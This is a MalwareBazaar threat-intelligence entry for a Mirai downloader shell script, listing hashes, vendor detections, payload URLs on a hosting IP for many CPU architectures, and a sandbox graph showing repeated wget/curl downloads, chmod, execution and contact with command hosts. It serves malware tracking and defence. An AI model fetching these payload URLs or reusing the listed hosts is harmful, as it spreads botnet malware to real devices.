MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 9


Intelligence 9 IOCs YARA 2 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8
SHA3-384 hash: a6eee95d6b08ec11cfc1cdc88914cdcc181e6945cf475d35ded2b2b89c7638e9363131856692e78e5722d0a319f1cdb7
SHA1 hash: 72f5a9095e542b4220875e4da997c286c69fc8e4
MD5 hash: 7175b22fa036827b323d1d6e4a2dd998
humanhash: kansas-quebec-mirror-hamper
File name:newreaxe.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:3'197 bytes
First seen:2025-12-31 19:21:12 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 96:ih0thzyhaXh18hpAhOlhgFhZeLh8rhbeh36hGf3hOVhD5:a0XzKax1EpIOvgPZY81b23SGfRO/D5
TLSH T1826188F7A2C247306EA95972A3A8D504BCC5E1F3B9962E345CF924FEE48CE043744957
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.x86a032e7a7053822b6d37f8dc47c093ee0ba09ca5b95ad8413f8511fb0cf9c8abd Miraielf geofenced mirai ua-wget USA x86
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.mips50fb71af4bd1a64094411511e589a57204996c4d710205183077c33bd519a691 Miraielf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arcd76564ccae6da46add86edce0bb04f496cd1314627037762b9af384f8b559d98 Miraielf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.i686b5d446d3991fb2adbb7e31a3ecb733973183363f9efb07f32ec27272e835953f Miraielf geofenced mirai ua-wget USA x86
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.x86_64c032550cc344c3f14b7c564ea58a3c5159ed4e8edb4266f59bfc3e7e8a13ea9e Miraielf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.mpsleb3418495b5dfb16051c2de9bb8b5bc66e9b41e1d3d99e3ea99ff6a6d6259331 Miraielf geofenced mips mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arma438ffb10ea3becb4c73479c32cbbbbd4bc10d9fb0b6b7b9f098a10ae0edc325 Miraielf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arm54a9c10ff6a733c2d5b6f36efe6bc90eeec03d8a02c3cfbb176ba3c6e8959281d Miraiarm elf geofenced mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arm6e71d81bf192f040d0ea8745ee49be356c84ab886538fc96f2cae915e31b019c3 Miraiarm elf geofenced mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arm7888a0bbfc855fdd57b1ffc7959b837e1f75fb344b6a871eb3a96865ebf4938d8 Miraiarm elf geofenced mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.ppca4f605c2274bb2aabae86e5b5fb0bfe540353981dcb49b4f3a57ae4fbfb64c8c Miraielf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.spc70187d1faf0c941e42fabedcc9b769bda9090d5e90c4f9585c57b5d0bcca27b8 Miraielf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.m68k76c85b80fb3f7aac818f1d79d98750e665275d4060b5ba81c0366b9fe84ca948 Miraielf geofenced m68k mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.sh417e065d59586f2fc634de3340309c609b8ed11c7606df41e6583cba42571169f Miraielf geofenced mirai SuperH ua-wget USA

Intelligence

File Origin
# of uploads :
1
# of downloads :
54
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
File Type:
unix shell
First seen:
2025-12-31T16:19:00Z UTC
Last seen:
2026-01-02T05:33:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/cac0122b-0d0a-43ba-8101-87ffe24a3641
Behavior Graph:
Download SVG
%3 guuid=7d37543a-1a00-0000-f68c-9c0a030b0000 pid=2819 /usr/bin/sudo guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822 /tmp/sample.bin guuid=7d37543a-1a00-0000-f68c-9c0a030b0000 pid=2819->guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822 execve guuid=5767e63c-1a00-0000-f68c-9c0a070b0000 pid=2823 /usr/bin/cp guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=5767e63c-1a00-0000-f68c-9c0a070b0000 pid=2823 execve guuid=3230a341-1a00-0000-f68c-9c0a0f0b0000 pid=2831 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=3230a341-1a00-0000-f68c-9c0a0f0b0000 pid=2831 execve guuid=eaba9847-1a00-0000-f68c-9c0a1a0b0000 pid=2842 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=eaba9847-1a00-0000-f68c-9c0a1a0b0000 pid=2842 execve guuid=6038b251-1a00-0000-f68c-9c0a2e0b0000 pid=2862 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=6038b251-1a00-0000-f68c-9c0a2e0b0000 pid=2862 execve guuid=d877fb51-1a00-0000-f68c-9c0a300b0000 pid=2864 /tmp/m9x7k2v8b3.x86 net guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=d877fb51-1a00-0000-f68c-9c0a300b0000 pid=2864 execve guuid=7a4f377f-1b00-0000-f68c-9c0a3e0d0000 pid=3390 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=7a4f377f-1b00-0000-f68c-9c0a3e0d0000 pid=3390 execve guuid=e6d6d67f-1b00-0000-f68c-9c0a3f0d0000 pid=3391 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=e6d6d67f-1b00-0000-f68c-9c0a3f0d0000 pid=3391 execve guuid=d4f79086-1b00-0000-f68c-9c0a4a0d0000 pid=3402 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=d4f79086-1b00-0000-f68c-9c0a4a0d0000 pid=3402 execve guuid=d6c2158e-1b00-0000-f68c-9c0a590d0000 pid=3417 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=d6c2158e-1b00-0000-f68c-9c0a590d0000 pid=3417 execve guuid=a42f668e-1b00-0000-f68c-9c0a5a0d0000 pid=3418 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=a42f668e-1b00-0000-f68c-9c0a5a0d0000 pid=3418 clone guuid=f9e02f8f-1b00-0000-f68c-9c0a5f0d0000 pid=3423 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=f9e02f8f-1b00-0000-f68c-9c0a5f0d0000 pid=3423 execve guuid=6eeec092-1b00-0000-f68c-9c0a690d0000 pid=3433 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=6eeec092-1b00-0000-f68c-9c0a690d0000 pid=3433 execve guuid=ff3a8f98-1b00-0000-f68c-9c0a7c0d0000 pid=3452 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=ff3a8f98-1b00-0000-f68c-9c0a7c0d0000 pid=3452 execve guuid=4ed9c0a0-1b00-0000-f68c-9c0a950d0000 pid=3477 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=4ed9c0a0-1b00-0000-f68c-9c0a950d0000 pid=3477 execve guuid=380622a1-1b00-0000-f68c-9c0a970d0000 pid=3479 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=380622a1-1b00-0000-f68c-9c0a970d0000 pid=3479 clone guuid=8212bea2-1b00-0000-f68c-9c0a9d0d0000 pid=3485 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=8212bea2-1b00-0000-f68c-9c0a9d0d0000 pid=3485 execve guuid=3e4a2ca4-1b00-0000-f68c-9c0aa20d0000 pid=3490 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=3e4a2ca4-1b00-0000-f68c-9c0aa20d0000 pid=3490 execve guuid=0acf3fa8-1b00-0000-f68c-9c0aaf0d0000 pid=3503 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=0acf3fa8-1b00-0000-f68c-9c0aaf0d0000 pid=3503 execve guuid=31a612b0-1b00-0000-f68c-9c0ac20d0000 pid=3522 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=31a612b0-1b00-0000-f68c-9c0ac20d0000 pid=3522 execve guuid=aaa064b0-1b00-0000-f68c-9c0ac30d0000 pid=3523 /tmp/m9x7k2v8b3.i686 net guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=aaa064b0-1b00-0000-f68c-9c0ac30d0000 pid=3523 execve guuid=d5852fde-1c00-0000-f68c-9c0ac8100000 pid=4296 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=d5852fde-1c00-0000-f68c-9c0ac8100000 pid=4296 execve guuid=f592a0de-1c00-0000-f68c-9c0ac9100000 pid=4297 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=f592a0de-1c00-0000-f68c-9c0ac9100000 pid=4297 execve guuid=ee3b31e3-1c00-0000-f68c-9c0ada100000 pid=4314 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=ee3b31e3-1c00-0000-f68c-9c0ada100000 pid=4314 execve guuid=edcdf6e9-1c00-0000-f68c-9c0aee100000 pid=4334 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=edcdf6e9-1c00-0000-f68c-9c0aee100000 pid=4334 execve guuid=8fc064ea-1c00-0000-f68c-9c0af0100000 pid=4336 /tmp/m9x7k2v8b3.x86_64 mprotect-exec net guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=8fc064ea-1c00-0000-f68c-9c0af0100000 pid=4336 execve guuid=bddace15-1e00-0000-f68c-9c0a2f140000 pid=5167 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=bddace15-1e00-0000-f68c-9c0a2f140000 pid=5167 execve guuid=a6ceea2a-1e00-0000-f68c-9c0a30140000 pid=5168 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=a6ceea2a-1e00-0000-f68c-9c0a30140000 pid=5168 execve guuid=fb088034-1e00-0000-f68c-9c0a32140000 pid=5170 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=fb088034-1e00-0000-f68c-9c0a32140000 pid=5170 execve guuid=6281043e-1e00-0000-f68c-9c0a41140000 pid=5185 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=6281043e-1e00-0000-f68c-9c0a41140000 pid=5185 execve guuid=e9065b3e-1e00-0000-f68c-9c0a42140000 pid=5186 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=e9065b3e-1e00-0000-f68c-9c0a42140000 pid=5186 clone guuid=76403f40-1e00-0000-f68c-9c0a47140000 pid=5191 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=76403f40-1e00-0000-f68c-9c0a47140000 pid=5191 execve guuid=ed5b8a40-1e00-0000-f68c-9c0a49140000 pid=5193 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=ed5b8a40-1e00-0000-f68c-9c0a49140000 pid=5193 execve guuid=2c470f44-1e00-0000-f68c-9c0a53140000 pid=5203 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=2c470f44-1e00-0000-f68c-9c0a53140000 pid=5203 execve guuid=b5d6034a-1e00-0000-f68c-9c0a62140000 pid=5218 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=b5d6034a-1e00-0000-f68c-9c0a62140000 pid=5218 execve guuid=2ad96b4a-1e00-0000-f68c-9c0a63140000 pid=5219 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=2ad96b4a-1e00-0000-f68c-9c0a63140000 pid=5219 clone guuid=60bdb44b-1e00-0000-f68c-9c0a67140000 pid=5223 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=60bdb44b-1e00-0000-f68c-9c0a67140000 pid=5223 execve guuid=fab45e4c-1e00-0000-f68c-9c0a69140000 pid=5225 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=fab45e4c-1e00-0000-f68c-9c0a69140000 pid=5225 execve guuid=3d184751-1e00-0000-f68c-9c0a77140000 pid=5239 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=3d184751-1e00-0000-f68c-9c0a77140000 pid=5239 execve guuid=09cba758-1e00-0000-f68c-9c0a9a140000 pid=5274 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=09cba758-1e00-0000-f68c-9c0a9a140000 pid=5274 execve guuid=73261159-1e00-0000-f68c-9c0a9d140000 pid=5277 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=73261159-1e00-0000-f68c-9c0a9d140000 pid=5277 clone guuid=fcac0a5a-1e00-0000-f68c-9c0aa1140000 pid=5281 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=fcac0a5a-1e00-0000-f68c-9c0aa1140000 pid=5281 execve guuid=48eeed5d-1e00-0000-f68c-9c0aa3140000 pid=5283 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=48eeed5d-1e00-0000-f68c-9c0aa3140000 pid=5283 execve guuid=d5b19062-1e00-0000-f68c-9c0aa4140000 pid=5284 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=d5b19062-1e00-0000-f68c-9c0aa4140000 pid=5284 execve guuid=cf78396a-1e00-0000-f68c-9c0aa8140000 pid=5288 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=cf78396a-1e00-0000-f68c-9c0aa8140000 pid=5288 execve guuid=6542886a-1e00-0000-f68c-9c0aa9140000 pid=5289 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=6542886a-1e00-0000-f68c-9c0aa9140000 pid=5289 clone guuid=03c6346b-1e00-0000-f68c-9c0aad140000 pid=5293 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=03c6346b-1e00-0000-f68c-9c0aad140000 pid=5293 execve guuid=608f7b6b-1e00-0000-f68c-9c0aae140000 pid=5294 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=608f7b6b-1e00-0000-f68c-9c0aae140000 pid=5294 execve guuid=1ba4d96f-1e00-0000-f68c-9c0ab5140000 pid=5301 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=1ba4d96f-1e00-0000-f68c-9c0ab5140000 pid=5301 execve guuid=b7530d75-1e00-0000-f68c-9c0ab6140000 pid=5302 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=b7530d75-1e00-0000-f68c-9c0ab6140000 pid=5302 execve guuid=a0ed5375-1e00-0000-f68c-9c0ab7140000 pid=5303 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=a0ed5375-1e00-0000-f68c-9c0ab7140000 pid=5303 clone guuid=8efade75-1e00-0000-f68c-9c0ab9140000 pid=5305 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=8efade75-1e00-0000-f68c-9c0ab9140000 pid=5305 execve guuid=f8df2176-1e00-0000-f68c-9c0aba140000 pid=5306 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=f8df2176-1e00-0000-f68c-9c0aba140000 pid=5306 execve guuid=0051ad79-1e00-0000-f68c-9c0abb140000 pid=5307 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=0051ad79-1e00-0000-f68c-9c0abb140000 pid=5307 execve guuid=acca137e-1e00-0000-f68c-9c0abc140000 pid=5308 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=acca137e-1e00-0000-f68c-9c0abc140000 pid=5308 execve guuid=9c5c597e-1e00-0000-f68c-9c0abd140000 pid=5309 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=9c5c597e-1e00-0000-f68c-9c0abd140000 pid=5309 clone guuid=c61af37e-1e00-0000-f68c-9c0abf140000 pid=5311 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=c61af37e-1e00-0000-f68c-9c0abf140000 pid=5311 execve guuid=c128797f-1e00-0000-f68c-9c0ac0140000 pid=5312 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=c128797f-1e00-0000-f68c-9c0ac0140000 pid=5312 execve guuid=9426cd84-1e00-0000-f68c-9c0ac1140000 pid=5313 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=9426cd84-1e00-0000-f68c-9c0ac1140000 pid=5313 execve guuid=fb88698a-1e00-0000-f68c-9c0ac2140000 pid=5314 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=fb88698a-1e00-0000-f68c-9c0ac2140000 pid=5314 execve guuid=7658c18a-1e00-0000-f68c-9c0ac3140000 pid=5315 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=7658c18a-1e00-0000-f68c-9c0ac3140000 pid=5315 clone guuid=808a9c8b-1e00-0000-f68c-9c0ac5140000 pid=5317 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=808a9c8b-1e00-0000-f68c-9c0ac5140000 pid=5317 execve guuid=2f041a8c-1e00-0000-f68c-9c0ac6140000 pid=5318 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=2f041a8c-1e00-0000-f68c-9c0ac6140000 pid=5318 execve guuid=1b65d890-1e00-0000-f68c-9c0ac7140000 pid=5319 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=1b65d890-1e00-0000-f68c-9c0ac7140000 pid=5319 execve guuid=f51a3197-1e00-0000-f68c-9c0ac8140000 pid=5320 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=f51a3197-1e00-0000-f68c-9c0ac8140000 pid=5320 execve guuid=a7c98697-1e00-0000-f68c-9c0ac9140000 pid=5321 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=a7c98697-1e00-0000-f68c-9c0ac9140000 pid=5321 clone guuid=df1c3498-1e00-0000-f68c-9c0acb140000 pid=5323 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=df1c3498-1e00-0000-f68c-9c0acb140000 pid=5323 execve guuid=b54b9598-1e00-0000-f68c-9c0acc140000 pid=5324 /usr/bin/wget net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=b54b9598-1e00-0000-f68c-9c0acc140000 pid=5324 execve guuid=9aa2fc9d-1e00-0000-f68c-9c0acd140000 pid=5325 /usr/bin/curl net send-data write-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=9aa2fc9d-1e00-0000-f68c-9c0acd140000 pid=5325 execve guuid=431672a4-1e00-0000-f68c-9c0ace140000 pid=5326 /usr/bin/chmod guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=431672a4-1e00-0000-f68c-9c0ace140000 pid=5326 execve guuid=0354c0a4-1e00-0000-f68c-9c0acf140000 pid=5327 /usr/bin/bash guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=0354c0a4-1e00-0000-f68c-9c0acf140000 pid=5327 clone guuid=75ef6da5-1e00-0000-f68c-9c0ad1140000 pid=5329 /usr/bin/rm delete-file guuid=987f803c-1a00-0000-f68c-9c0a060b0000 pid=2822->guuid=75ef6da5-1e00-0000-f68c-9c0ad1140000 pid=5329 execve 2e80acb7-1597-5afb-843d-1c5743c25138 130.12.180.72:80 guuid=3230a341-1a00-0000-f68c-9c0a0f0b0000 pid=2831->2e80acb7-1597-5afb-843d-1c5743c25138 send: 152B guuid=eaba9847-1a00-0000-f68c-9c0a1a0b0000 pid=2842->2e80acb7-1597-5afb-843d-1c5743c25138 send: 101B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=d877fb51-1a00-0000-f68c-9c0a300b0000 pid=2864->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=6afb7b52-1a00-0000-f68c-9c0a330b0000 pid=2867 /tmp/m9x7k2v8b3.x86 guuid=d877fb51-1a00-0000-f68c-9c0a300b0000 pid=2864->guuid=6afb7b52-1a00-0000-f68c-9c0a330b0000 pid=2867 clone guuid=64e9fc7e-1b00-0000-f68c-9c0a3c0d0000 pid=3388 /tmp/m9x7k2v8b3.x86 guuid=d877fb51-1a00-0000-f68c-9c0a300b0000 pid=2864->guuid=64e9fc7e-1b00-0000-f68c-9c0a3c0d0000 pid=3388 clone guuid=02830d7f-1b00-0000-f68c-9c0a3d0d0000 pid=3389 /tmp/m9x7k2v8b3.x86 net send-data zombie guuid=d877fb51-1a00-0000-f68c-9c0a300b0000 pid=2864->guuid=02830d7f-1b00-0000-f68c-9c0a3d0d0000 pid=3389 clone guuid=6add8452-1a00-0000-f68c-9c0a340b0000 pid=2868 /tmp/m9x7k2v8b3.x86 guuid=6afb7b52-1a00-0000-f68c-9c0a330b0000 pid=2867->guuid=6add8452-1a00-0000-f68c-9c0a340b0000 pid=2868 clone guuid=833c8852-1a00-0000-f68c-9c0a350b0000 pid=2869 /tmp/m9x7k2v8b3.x86 dns net send-data zombie guuid=6afb7b52-1a00-0000-f68c-9c0a330b0000 pid=2867->guuid=833c8852-1a00-0000-f68c-9c0a350b0000 pid=2869 clone guuid=833c8852-1a00-0000-f68c-9c0a350b0000 pid=2869->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 38B 852eada3-51ac-5275-909a-778490b5e6b0 play.mclighthouse.ir:6742 guuid=833c8852-1a00-0000-f68c-9c0a350b0000 pid=2869->852eada3-51ac-5275-909a-778490b5e6b0 send: 17B guuid=02830d7f-1b00-0000-f68c-9c0a3d0d0000 pid=3389->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 975B 310a0ed0-c544-54ca-bf3f-fca55e459297 65.222.202.53:80 guuid=02830d7f-1b00-0000-f68c-9c0a3d0d0000 pid=3389->310a0ed0-c544-54ca-bf3f-fca55e459297 send: 4B ad785374-9e7c-5217-acbe-83a9cb2f51b9 play.mclighthouse.ir:80 guuid=e6d6d67f-1b00-0000-f68c-9c0a3f0d0000 pid=3391->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 153B guuid=d4f79086-1b00-0000-f68c-9c0a4a0d0000 pid=3402->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 102B guuid=6eeec092-1b00-0000-f68c-9c0a690d0000 pid=3433->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 152B guuid=ff3a8f98-1b00-0000-f68c-9c0a7c0d0000 pid=3452->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 101B guuid=3e4a2ca4-1b00-0000-f68c-9c0aa20d0000 pid=3490->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 153B guuid=0acf3fa8-1b00-0000-f68c-9c0aaf0d0000 pid=3503->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 102B guuid=aaa064b0-1b00-0000-f68c-9c0ac30d0000 pid=3523->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=f9a538b1-1b00-0000-f68c-9c0ac40d0000 pid=3524 /tmp/m9x7k2v8b3.i686 guuid=aaa064b0-1b00-0000-f68c-9c0ac30d0000 pid=3523->guuid=f9a538b1-1b00-0000-f68c-9c0ac40d0000 pid=3524 clone guuid=64301ede-1c00-0000-f68c-9c0ac6100000 pid=4294 /tmp/m9x7k2v8b3.i686 guuid=aaa064b0-1b00-0000-f68c-9c0ac30d0000 pid=3523->guuid=64301ede-1c00-0000-f68c-9c0ac6100000 pid=4294 clone guuid=2b5623de-1c00-0000-f68c-9c0ac7100000 pid=4295 /tmp/m9x7k2v8b3.i686 net send-data zombie guuid=aaa064b0-1b00-0000-f68c-9c0ac30d0000 pid=3523->guuid=2b5623de-1c00-0000-f68c-9c0ac7100000 pid=4295 clone guuid=146842b1-1b00-0000-f68c-9c0ac50d0000 pid=3525 /tmp/m9x7k2v8b3.i686 guuid=f9a538b1-1b00-0000-f68c-9c0ac40d0000 pid=3524->guuid=146842b1-1b00-0000-f68c-9c0ac50d0000 pid=3525 clone guuid=91f147b1-1b00-0000-f68c-9c0ac60d0000 pid=3526 /tmp/m9x7k2v8b3.i686 dns net send-data zombie guuid=f9a538b1-1b00-0000-f68c-9c0ac40d0000 pid=3524->guuid=91f147b1-1b00-0000-f68c-9c0ac60d0000 pid=3526 clone guuid=91f147b1-1b00-0000-f68c-9c0ac60d0000 pid=3526->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 38B guuid=91f147b1-1b00-0000-f68c-9c0ac60d0000 pid=3526->852eada3-51ac-5275-909a-778490b5e6b0 send: 17B guuid=2b5623de-1c00-0000-f68c-9c0ac7100000 pid=4295->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 975B guuid=2b5623de-1c00-0000-f68c-9c0ac7100000 pid=4295->310a0ed0-c544-54ca-bf3f-fca55e459297 send: 2B guuid=f592a0de-1c00-0000-f68c-9c0ac9100000 pid=4297->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 155B guuid=ee3b31e3-1c00-0000-f68c-9c0ada100000 pid=4314->ad785374-9e7c-5217-acbe-83a9cb2f51b9 send: 104B guuid=8fc064ea-1c00-0000-f68c-9c0af0100000 pid=4336->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=09771ceb-1c00-0000-f68c-9c0af3100000 pid=4339 /tmp/m9x7k2v8b3.x86_64 guuid=8fc064ea-1c00-0000-f68c-9c0af0100000 pid=4336->guuid=09771ceb-1c00-0000-f68c-9c0af3100000 pid=4339 clone guuid=8b01b215-1e00-0000-f68c-9c0a2d140000 pid=5165 /tmp/m9x7k2v8b3.x86_64 guuid=8fc064ea-1c00-0000-f68c-9c0af0100000 pid=4336->guuid=8b01b215-1e00-0000-f68c-9c0a2d140000 pid=5165 clone guuid=d72cba15-1e00-0000-f68c-9c0a2e140000 pid=5166 /tmp/m9x7k2v8b3.x86_64 net send-data zombie guuid=8fc064ea-1c00-0000-f68c-9c0af0100000 pid=4336->guuid=d72cba15-1e00-0000-f68c-9c0a2e140000 pid=5166 clone guuid=dfdf25eb-1c00-0000-f68c-9c0af4100000 pid=4340 /tmp/m9x7k2v8b3.x86_64 guuid=09771ceb-1c00-0000-f68c-9c0af3100000 pid=4339->guuid=dfdf25eb-1c00-0000-f68c-9c0af4100000 pid=4340 clone guuid=855c2ceb-1c00-0000-f68c-9c0af5100000 pid=4341 